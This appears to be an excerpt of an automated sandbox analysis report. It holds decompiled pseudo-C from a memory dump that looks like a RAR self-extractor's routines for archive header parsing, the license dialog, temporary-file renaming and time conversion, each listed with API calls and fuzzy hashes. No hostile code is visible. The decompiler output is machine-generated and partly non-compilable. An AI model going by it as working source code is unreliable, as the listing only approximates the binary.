                • Opcode Fuzzy Hash: 7ed5c1c0cdcd845382f34b121a7d0aeafe8252057439912e095514fe05479421
                • Instruction Fuzzy Hash: 7C21D5729812147BEB216BA4CC8AFFE776CEF05711F004122FB12BA191DB748F419AB0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CC8422(char _a4) {
                				char _v8;
                
                				_t26 = _a4;
                				_t52 =  *_a4;
                				if( *_a4 != 0xcd4be0) {
                					E00CC7A50(_t52);
                					_t26 = _a4;
                				}
                				E00CC7A50( *((intOrPtr*)(_t26 + 0x3c)));
                				E00CC7A50( *((intOrPtr*)(_a4 + 0x30)));
                				E00CC7A50( *((intOrPtr*)(_a4 + 0x34)));
                				E00CC7A50( *((intOrPtr*)(_a4 + 0x38)));
                				E00CC7A50( *((intOrPtr*)(_a4 + 0x28)));
                				E00CC7A50( *((intOrPtr*)(_a4 + 0x2c)));
                				E00CC7A50( *((intOrPtr*)(_a4 + 0x40)));
                				E00CC7A50( *((intOrPtr*)(_a4 + 0x44)));
                				E00CC7A50( *((intOrPtr*)(_a4 + 0x360)));
                				_v8 =  &_a4;
                				E00CC82E8(5,  &_v8);
                				_v8 =  &_a4;
                				return E00CC8338(4,  &_v8);
                			}

                APIs
                • _free.LIBCMT ref: 00CC8436
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CC8442
                • _free.LIBCMT ref: 00CC844D
                • _free.LIBCMT ref: 00CC8458
                • _free.LIBCMT ref: 00CC8463
                • _free.LIBCMT ref: 00CC846E
                • _free.LIBCMT ref: 00CC8479
                • _free.LIBCMT ref: 00CC8484
                • _free.LIBCMT ref: 00CC848F
                • _free.LIBCMT ref: 00CC849D
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 1477587a45d065a9f61667cb4e98f34e638de0efa1da3cf894bc5bf390db252c
                • Instruction ID: f3ae61b6860fc288e4a4e6a9966cd88a15e111205439b239465a763ea2c766ed
                • Opcode Fuzzy Hash: 1477587a45d065a9f61667cb4e98f34e638de0efa1da3cf894bc5bf390db252c
                • Instruction Fuzzy Hash: 3811A775104508FFCB41EF65C842EDE3B65EF04350B4162A9FA1A4B222DA31DB50BF80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E00CA200C(intOrPtr __ecx) {
                				signed int _t135;
                				void* _t137;
                				signed int _t139;
                				unsigned int _t140;
                				signed int _t144;
                				signed int _t161;
                				signed int _t164;
                				void* _t167;
                				void* _t172;
                				signed int _t175;
                				signed char _t178;
                				signed char _t179;
                				signed char _t180;
                				signed int _t182;
                				signed int _t185;
                				signed int _t187;
                				signed int _t188;
                				signed char _t220;
                				signed char _t232;
                				signed int _t233;
                				signed int _t236;
                				intOrPtr _t240;
                				signed int _t244;
                				signed int _t246;
                				signed int _t247;
                				signed int _t257;
                				signed int _t258;
                				signed char _t262;
                				signed int _t263;
                				signed int _t265;
                				intOrPtr _t272;
                				intOrPtr _t275;
                				intOrPtr _t278;
                				intOrPtr _t314;
                				signed int _t315;
                				intOrPtr _t318;
                				signed int _t322;
                				void* _t323;
                				void* _t324;
                				void* _t326;
                				void* _t327;
                				void* _t328;
                				void* _t329;
                				void* _t330;
                				void* _t331;
                				void* _t332;
                				void* _t333;
                				void* _t334;
                				intOrPtr* _t336;
                				signed int _t339;
                				void* _t340;
                				signed int _t341;
                				char* _t342;
                				void* _t343;
                				void* _t344;
                				signed int _t348;
                				signed int _t351;
                				signed int _t366;
                
                				E00CBD940();
                				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
                				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
                				_t314 =  *((intOrPtr*)(_t318 + 0x18));
                				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
                				if(_t135 <  *(_t318 + 0x1c)) {
                					L104:
                					return _t135;
                				}
                				_t315 = _t314 - _t135;
                				 *(_t318 + 0x1c) = _t135;
                				if(_t315 >= 2) {
                					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
                					while(1) {
                						_t135 = E00CAC39E(_t315);
                						_t244 = _t135;
                						_t348 = _t315;
                						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
                							break;
                						}
                						_t322 =  *(_t318 + 0x1c);
                						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
                						if(_t135 == 0) {
                							break;
                						}
                						_t351 = _t315;
                						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
                							break;
                						} else {
                							_t339 = _t322 + _t244;
                							 *(_t344 + 0x28) = _t339;
                							_t137 = E00CAC39E(_t315);
                							_t340 = _t339 -  *(_t318 + 0x1c);
                							_t323 = _t137;
                							_t135 = _t315;
                							_t246 = 0;
                							 *(_t344 + 0x24) = _t135;
                							 *(_t344 + 0x20) = 0;
                							if(0 < 0 || 0 <= 0 && _t340 < 0) {
                								break;
                							} else {
                								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
                									 *((char*)(_t240 + 0x1e)) = 1;
                									_t232 = E00CAC39E(_t315);
                									 *(_t344 + 0x1c) = _t232;
                									if((_t232 & 0x00000001) != 0) {
                										_t236 = E00CAC39E(_t315);
                										if((_t236 | _t315) != 0) {
                											asm("adc eax, edx");
                											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
                											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
                										}
                										_t232 =  *(_t344 + 0x1c);
                									}
                									if((_t232 & 0x00000002) != 0) {
                										_t233 = E00CAC39E(_t315);
                										if((_t233 | _t315) != 0) {
                											asm("adc eax, edx");
                											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
                											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
                										}
                									}
                									_t246 =  *(_t344 + 0x20);
                									_t135 =  *(_t344 + 0x24);
                								}
                								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
                									_t366 = _t135;
                									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
                										goto L102;
                									} else {
                										_t324 = _t323 - 1;
                										if(_t324 == 0) {
                											_t139 = E00CAC39E(_t315);
                											__eflags = _t139;
                											if(_t139 == 0) {
                												_t140 = E00CAC39E(_t315);
                												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
                												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
                												_t144 = E00CAC251(_t318) & 0x000000ff;
                												 *(_t240 + 0x10ec) = _t144;
                												__eflags = _t144 - 0x18;
                												if(_t144 > 0x18) {
                													E00CA3E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
                													_t257 =  *(_t344 + 0x28);
                													_t167 = _t344 + 0x40;
                													_t344 = _t344 + 0x10;
                													E00CA3DEC(_t257, _t240 + 0x28, _t167);
                												}
                												E00CAC300(_t318, _t240 + 0x10a1, 0x10);
                												E00CAC300(_t318, _t240 + 0x10b1, 0x10);
                												__eflags =  *(_t240 + 0x10c1);
                												if( *(_t240 + 0x10c1) != 0) {
                													_t325 = _t240 + 0x10c2;
                													E00CAC300(_t318, _t240 + 0x10c2, 8);
                													E00CAC300(_t318, _t344 + 0x30, 4);
                													E00CAF524(_t344 + 0x58);
                													E00CAF56A(_t344 + 0x60, _t240 + 0x10c2, 8);
                													_push(_t344 + 0x30);
                													E00CAF435(_t344 + 0x5c);
                													_t161 = E00CBF3CA(_t344 + 0x34, _t344 + 0x34, 4);
                													_t344 = _t344 + 0xc;
                													asm("sbb al, al");
                													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
                													 *(_t240 + 0x10c1) =  ~_t161 + 1;
                													if( *((intOrPtr*)(_t240 + 4)) == 3) {
                														_t164 = E00CBF3CA(_t325, 0xcd2398, 8);
                														_t344 = _t344 + 0xc;
                														__eflags = _t164;
                														if(_t164 == 0) {
                															 *(_t240 + 0x10c1) = _t164;
                														}
                													}
                												}
                												 *((char*)(_t240 + 0x10a0)) = 1;
                												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
                												 *((char*)(_t240 + 0x109b)) = 1;
                											} else {
                												E00CA3E41(_t344 + 0x38, 0x14, L"x%u", _t139);
                												_t258 =  *(_t344 + 0x28);
                												_t172 = _t344 + 0x40;
                												_t344 = _t344 + 0x10;
                												E00CA3DEC(_t258, _t240 + 0x28, _t172);
                											}
                											goto L102;
                										}
                										_t326 = _t324 - 1;
                										if(_t326 == 0) {
                											_t175 = E00CAC39E(_t315);
                											__eflags = _t175;
                											if(_t175 != 0) {
                												goto L102;
                											}
                											_push(0x20);
                											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
                											_push(_t240 + 0x1074);
                											L40:
                											E00CAC300(_t318);
                											goto L102;
                										}
                										_t327 = _t326 - 1;
                										if(_t327 == 0) {
                											__eflags = _t246;
                											if(__eflags < 0) {
                												goto L102;
                											}
                											if(__eflags > 0) {
                												L65:
                												_t178 = E00CAC39E(_t315);
                												 *(_t344 + 0x13) = _t178;
                												_t179 = _t178 & 0x00000001;
                												_t262 =  *(_t344 + 0x13);
                												 *(_t344 + 0x14) = _t179;
                												_t315 = _t262 & 0x00000002;
                												__eflags = _t315;
                												 *(_t344 + 0x15) = _t315;
                												if(_t315 != 0) {
                													_t278 = _t318;
                													__eflags = _t179;
                													if(__eflags == 0) {
                														E00CB0A64(_t240 + 0x1040, _t315, E00CAC2E0(_t278, __eflags), _t315);
                													} else {
                														E00CB0A25(_t240 + 0x1040, _t315, E00CAC29E(_t278), 0);
                													}
                													_t262 =  *(_t344 + 0x13);
                													_t179 =  *(_t344 + 0x14);
                												}
                												_t263 = _t262 & 0x00000004;
                												__eflags = _t263;
                												 *(_t344 + 0x16) = _t263;
                												if(_t263 != 0) {
                													_t275 = _t318;
                													__eflags = _t179;
                													if(__eflags == 0) {
                														E00CB0A64(_t240 + 0x1048, _t315, E00CAC2E0(_t275, __eflags), _t315);
                													} else {
                														E00CB0A25(_t240 + 0x1048, _t315, E00CAC29E(_t275), 0);
                													}
                												}
                												_t180 =  *(_t344 + 0x13);
                												_t265 = _t180 & 0x00000008;
                												__eflags = _t265;
                												 *(_t344 + 0x17) = _t265;
                												if(_t265 != 0) {
                													__eflags =  *(_t344 + 0x14);
                													_t272 = _t318;
                													if(__eflags == 0) {
                														E00CB0A64(_t240 + 0x1050, _t315, E00CAC2E0(_t272, __eflags), _t315);
                													} else {
                														E00CB0A25(_t240 + 0x1050, _t315, E00CAC29E(_t272), 0);
                													}
                													_t180 =  *(_t344 + 0x13);
                												}
                												__eflags =  *(_t344 + 0x14);
                												if( *(_t344 + 0x14) != 0) {
                													__eflags = _t180 & 0x00000010;
                													if((_t180 & 0x00000010) != 0) {
                														__eflags =  *(_t344 + 0x15);
                														if( *(_t344 + 0x15) == 0) {
                															_t341 = 0x3fffffff;
                															_t328 = 0x3b9aca00;
                														} else {
                															_t187 = E00CAC29E(_t318);
                															_t341 = 0x3fffffff;
                															_t328 = 0x3b9aca00;
                															_t188 = _t187 & 0x3fffffff;
                															__eflags = _t188 - 0x3b9aca00;
                															if(_t188 < 0x3b9aca00) {
                																E00CB06D0(_t240 + 0x1040, _t188, 0);
                															}
                														}
                														__eflags =  *(_t344 + 0x16);
                														if( *(_t344 + 0x16) != 0) {
                															_t185 = E00CAC29E(_t318) & _t341;
                															__eflags = _t185 - _t328;
                															if(_t185 < _t328) {
                																E00CB06D0(_t240 + 0x1048, _t185, 0);
                															}
                														}
                														__eflags =  *(_t344 + 0x17);
                														if( *(_t344 + 0x17) != 0) {
                															_t182 = E00CAC29E(_t318) & _t341;
                															__eflags = _t182 - _t328;
                															if(_t182 < _t328) {
                																E00CB06D0(_t240 + 0x1050, _t182, 0);
                															}
                														}
                													}
                												}
                												goto L102;
                											}
                											__eflags = _t340 - 5;
                											if(_t340 < 5) {
                												goto L102;
                											}
                											goto L65;
                										}
                										_t329 = _t327 - 1;
                										if(_t329 == 0) {
                											__eflags = _t246;
                											if(__eflags < 0) {
                												goto L102;
                											}
                											if(__eflags > 0) {
                												L60:
                												E00CAC39E(_t315);
                												__eflags = E00CAC39E(_t315);
                												if(__eflags != 0) {
                													 *((char*)(_t240 + 0x10f3)) = 1;
                													E00CA3E41(_t344 + 0x38, 0x14, L";%u", _t203);
                													_t344 = _t344 + 0x10;
                													E00CAFA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
                												}
                												goto L102;
                											}
                											__eflags = _t340 - 1;
                											if(_t340 < 1) {
                												goto L102;
                											}
                											goto L60;
                										}
                										_t330 = _t329 - 1;
                										if(_t330 == 0) {
                											 *((intOrPtr*)(_t240 + 0x1100)) = E00CAC39E(_t315);
                											 *(_t240 + 0x2104) = E00CAC39E(_t315) & 0x00000001;
                											_t331 = E00CAC39E(_t315);
                											 *((char*)(_t344 + 0xc0)) = 0;
                											__eflags = _t331 - 0x1fff;
                											if(_t331 < 0x1fff) {
                												E00CAC300(_t318, _t344 + 0xc4, _t331);
                												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
                											}
                											E00CAB9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
                											_push(0x800);
                											_push(_t240 + 0x1104);
                											_push(_t344 + 0xc8);
                											E00CB1094();
                											goto L102;
                										}
                										_t332 = _t330 - 1;
                										if(_t332 == 0) {
                											_t220 = E00CAC39E(_t315);
                											 *(_t344 + 0x1c) = _t220;
                											_t342 = _t240 + 0x2108;
                											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
                											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
                											 *((char*)(_t240 + 0x2208)) = 0;
                											 *_t342 = 0;
                											__eflags = _t220 & 0x00000001;
                											if((_t220 & 0x00000001) != 0) {
                												_t334 = E00CAC39E(_t315);
                												__eflags = _t334 - 0xff;
                												if(_t334 >= 0xff) {
                													_t334 = 0xff;
                												}
                												E00CAC300(_t318, _t342, _t334);
                												_t220 =  *(_t344 + 0x1c);
                												 *((char*)(_t334 + _t342)) = 0;
                											}
                											__eflags = _t220 & 0x00000002;
                											if((_t220 & 0x00000002) != 0) {
                												_t333 = E00CAC39E(_t315);
                												__eflags = _t333 - 0xff;
                												if(_t333 >= 0xff) {
                													_t333 = 0xff;
                												}
                												_t343 = _t240 + 0x2208;
                												E00CAC300(_t318, _t343, _t333);
                												 *((char*)(_t333 + _t343)) = 0;
                											}
                											__eflags =  *(_t240 + 0x2106);
                											if( *(_t240 + 0x2106) != 0) {
                												 *((intOrPtr*)(_t240 + 0x2308)) = E00CAC39E(_t315);
                											}
                											__eflags =  *(_t240 + 0x2107);
                											if( *(_t240 + 0x2107) != 0) {
                												 *((intOrPtr*)(_t240 + 0x230c)) = E00CAC39E(_t315);
                											}
                											 *((char*)(_t240 + 0x2105)) = 1;
                											goto L102;
                										}
                										if(_t332 != 1) {
                											goto L102;
                										}
                										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
                											_t340 = _t340 + 1;
                										}
                										_t336 = _t240 + 0x1028;
                										E00CA1EDE(_t336, _t340);
                										_push(_t340);
                										_push( *_t336);
                										goto L40;
                									}
                								} else {
                									L102:
                									_t247 =  *(_t344 + 0x28);
                									 *(_t318 + 0x1c) = _t247;
                									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
                									if(_t135 >= 2) {
                										continue;
                									}
                									break;
                								}
                							}
                						}
                					}
                				}
                			}


                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: ;%u$x%u$xc%u
                • API String ID: 0-2277559157
                • Opcode ID: eff44e84dcd4eb0abe0182e2e9cd87d245a28fcc624abb1096fa0f50b28b9d6c
                • Instruction ID: 00998b89f3c6e6319a80e1e678c2286b4b7308545d509b02ac2823e1296ff2f7
                • Opcode Fuzzy Hash: eff44e84dcd4eb0abe0182e2e9cd87d245a28fcc624abb1096fa0f50b28b9d6c
                • Instruction Fuzzy Hash: D3F198306053534BDF24EF2C8895BFE77A9AF96308F084579FD858B283CA20C944E762
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00CBA3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                				long _t9;
                				long _t10;
                				WCHAR* _t11;
                				void* _t25;
                				signed short _t28;
                				intOrPtr _t31;
                				struct HWND__* _t35;
                				intOrPtr _t36;
                				void* _t37;
                				struct HWND__* _t38;
                
                				_t28 = _a12;
                				_t36 = _a8;
                				_t35 = _a4;
                				if(E00CA12D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
                					L16:
                					__eflags = 1;
                					return 1;
                				}
                				_t37 = _t36 - 0x110;
                				if(_t37 == 0) {
                					E00CBC343(__edx, __eflags, __fp0, _t35);
                					_t9 =  *0xceb704;
                					__eflags = _t9;
                					if(_t9 != 0) {
                						SendMessageW(_t35, 0x80, 1, _t9);
                					}
                					_t10 =  *0xcf5d04;
                					__eflags = _t10;
                					if(_t10 != 0) {
                						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
                					}
                					_t11 =  *0xcfde1c;
                					__eflags = _t11;
                					if(__eflags != 0) {
                						SetWindowTextW(_t35, _t11);
                					}
                					_t38 = GetDlgItem(_t35, 0x65);
                					SendMessageW(_t38, 0x435, 0, 0x10000);
                					SendMessageW(_t38, 0x443, 0,  *0xcddf40(0xf));
                					 *0xcddf3c(_t35);
                					_t31 =  *0xce75ec; // 0x0
                					E00CB8FE6(_t31, __eflags,  *0xce0064, _t38,  *0xcfde18, 0, 0);
                					L00CC2B4E( *0xcfde1c);
                					L00CC2B4E( *0xcfde18);
                					goto L16;
                				}
                				if(_t37 != 1) {
                					L5:
                					return 0;
                				}
                				_t25 = (_t28 & 0x0000ffff) - 1;
                				if(_t25 == 0) {
                					_push(1);
                					L7:
                					EndDialog(_t35, ??);
                					goto L16;
                				}
                				if(_t25 == 1) {
                					_push(0);
                					goto L7;
                				}
                				goto L5;
                			}


                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • EndDialog.USER32(?,00000001), ref: 00CBA431
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBA45E
                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CBA473
                • SetWindowTextW.USER32(?,?), ref: 00CBA484
                • GetDlgItem.USER32(?,00000065), ref: 00CBA48D
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CBA4A1
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CBA4B3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                • Opcode ID: 2282b7de93555961b0b4331dc1707d65fd4b85d9323796ce0722be098d5f5cda
                • Instruction ID: 797a205f2b59c8aaa6ed9407cdf628309581479f6b5f4e983b68f651f71d997d
                • Opcode Fuzzy Hash: 2282b7de93555961b0b4331dc1707d65fd4b85d9323796ce0722be098d5f5cda
                • Instruction Fuzzy Hash: DE21D6326452047BE2115F75ED8DFBF7B6DEB46B85F014015F682E61A0CBA2ED01DA32
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00CA9268(void* __ecx) {
                				void* _t31;
                				short _t32;
                				long _t34;
                				void* _t39;
                				short _t41;
                				void* _t65;
                				intOrPtr _t68;
                				void* _t76;
                				intOrPtr _t79;
                				void* _t82;
                				WCHAR* _t83;
                				void* _t85;
                				void* _t87;
                
                				E00CBD870(E00CD1336, _t85);
                				E00CBD940();
                				_t83 =  *(_t85 + 8);
                				_t31 = _t85 - 0x4030;
                				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
                				if(_t31 == 0 || _t31 >= 0x800) {
                					L20:
                					_t32 = 0;
                					__eflags = 0;
                				} else {
                					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
                					if(_t34 == 0) {
                						goto L20;
                					} else {
                						_t92 = _t34 - 0x800;
                						if(_t34 >= 0x800) {
                							goto L20;
                						} else {
                							 *(_t85 + 8) = E00CAB943(_t92, _t85 - 0x4030);
                							_t78 = E00CAB943(_t92, _t85 - 0x5030);
                							_t68 = 0;
                							if( *_t38 == 0) {
                								goto L20;
                							} else {
                								_t39 = E00CB1410( *(_t85 + 8), _t78);
                								_t94 = _t39;
                								if(_t39 == 0) {
                									goto L20;
                								} else {
                									_t41 = E00CB1410(E00CAB943(_t94, _t83), _t78);
                									if(_t41 != 0) {
                										goto L20;
                									} else {
                										 *(_t85 - 0x100c) = _t41;
                										_t79 = 0;
                										while(1) {
                											_t96 = _t41;
                											if(_t41 != 0) {
                												break;
                											}
                											E00CAFAB1(_t85 - 0x100c, _t83, 0x800);
                											E00CA3E41(E00CAB943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
                											_t87 = _t87 + 0x10;
                											if(E00CA9E6B(_t85 - 0x100c) == 0) {
                												_t41 =  *(_t85 - 0x100c);
                											} else {
                												_t41 = 0;
                												 *(_t85 - 0x100c) = 0;
                											}
                											_t79 = _t79 + 0x7b;
                											if(_t79 < 0x2710) {
                												continue;
                											} else {
                												_t99 = _t41;
                												if(_t41 == 0) {
                													goto L20;
                												} else {
                													break;
                												}
                											}
                											goto L21;
                										}
                										E00CAFAB1(_t85 - 0x3030, _t83, 0x800);
                										_push(0x800);
                										E00CAB9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
                										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
                											goto L20;
                										} else {
                											E00CA943C(_t85 - 0x2030);
                											 *((intOrPtr*)(_t85 - 4)) = _t68;
                											if(E00CA9E6B(_t83) == 0) {
                												_push(0x12);
                												_push(_t83);
                												_t68 = E00CA9528(_t85 - 0x2030);
                											}
                											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
                											if(_t68 != 0) {
                												E00CA94DA(_t85 - 0x2030);
                												E00CA9621(_t85 - 0x2030);
                											}
                											E00CA946E(_t85 - 0x2030);
                											_t32 = 1;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				L21:
                				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
                				return _t32;
                			}


                APIs
                • __EH_prolog.LIBCMT ref: 00CA926D
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CA9290
                • GetShortPathNameW.KERNEL32 ref: 00CA92AF
                  • Part of subcall function 00CB1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00CAACFE,?,?,?,00CAACAD,?,-00000002,?,00000000,?), ref: 00CB1426
                • _swprintf.LIBCMT ref: 00CA934B
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • MoveFileW.KERNEL32(?,?), ref: 00CA93C0
                • MoveFileW.KERNEL32(?,?), ref: 00CA93FC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                • String ID: rtmp%d
                • API String ID: 2111052971-3303766350
                • Opcode ID: f6c3ae0e846af57be5494917926d4bee977f2d9c46c88bbe4c005cd87bd9bcc4
                • Instruction ID: 458a8a57c1c21cc2467d2ed31b0314949dfc20a32da08e393699fff6ef77638c
                • Opcode Fuzzy Hash: f6c3ae0e846af57be5494917926d4bee977f2d9c46c88bbe4c005cd87bd9bcc4
                • Instruction Fuzzy Hash: 9041A0B581111AA6CF20EBA0CC46FEE737CEF4A389F0444A5B605A3052EA34DF45DB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00CB06E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
                				struct _SYSTEMTIME _v16;
                				struct _SYSTEMTIME _v32;
                				struct _SYSTEMTIME _v48;
                				struct _FILETIME _v56;
                				struct _FILETIME _v64;
                				struct _FILETIME _v72;
                				intOrPtr _v76;
                				intOrPtr _v80;
                				signed int _t73;
                				void* _t81;
                				signed int _t85;
                				void* _t86;
                				intOrPtr _t87;
                				intOrPtr* _t89;
                				intOrPtr* _t90;
                				signed int* _t92;
                				signed int _t94;
                
                				_t87 = __edx;
                				_t90 = __ecx;
                				_v80 = E00CBDEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
                				_v76 = _t87;
                				if(E00CAA995() >= 0x600) {
                					FileTimeToSystemTime( &_v64,  &_v32);
                					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
                					SystemTimeToFileTime( &_v16,  &_v72);
                					SystemTimeToFileTime( &_v32,  &_v56);
                					asm("sbb ecx, [esp+0x24]");
                					asm("sbb ecx, ebp");
                					asm("adc ecx, ebp");
                					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
                					asm("adc ecx, ebp");
                					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
                				} else {
                					FileTimeToLocalFileTime( &_v64,  &_v72);
                				}
                				FileTimeToSystemTime( &_v72,  &_v48);
                				_t92 = _a4;
                				_t81 = 1;
                				_t85 = _v48.wDay & 0x0000ffff;
                				_t94 = _v48.wMonth & 0x0000ffff;
                				_t88 = _v48.wYear & 0x0000ffff;
                				_t92[3] = _v48.wHour & 0x0000ffff;
                				_t92[4] = _v48.wMinute & 0x0000ffff;
                				_t92[5] = _v48.wSecond & 0x0000ffff;
                				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
                				 *_t92 = _v48.wYear & 0x0000ffff;
                				_t92[1] = _t94;
                				_t92[2] = _t85;
                				_t92[8] = _t85 - 1;
                				if(_t94 > 1) {
                					_t89 = 0xcdd084;
                					_t86 = 4;
                					while(_t86 <= 0x30) {
                						_t86 = _t86 + 4;
                						_t92[8] = _t92[8] +  *_t89;
                						_t89 = _t89 + 4;
                						_t81 = _t81 + 1;
                						if(_t81 < _t94) {
                							continue;
                						}
                						break;
                					}
                					_t88 = _v48.wYear & 0x0000ffff;
                				}
                				if(_t94 > 2 && E00CB0849(_t88) != 0) {
                					_t92[8] = _t92[8] + 1;
                				}
                				_t73 = E00CBDF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
                				_t92[6] = _t73;
                				return _t73;
                			}





















                APIs
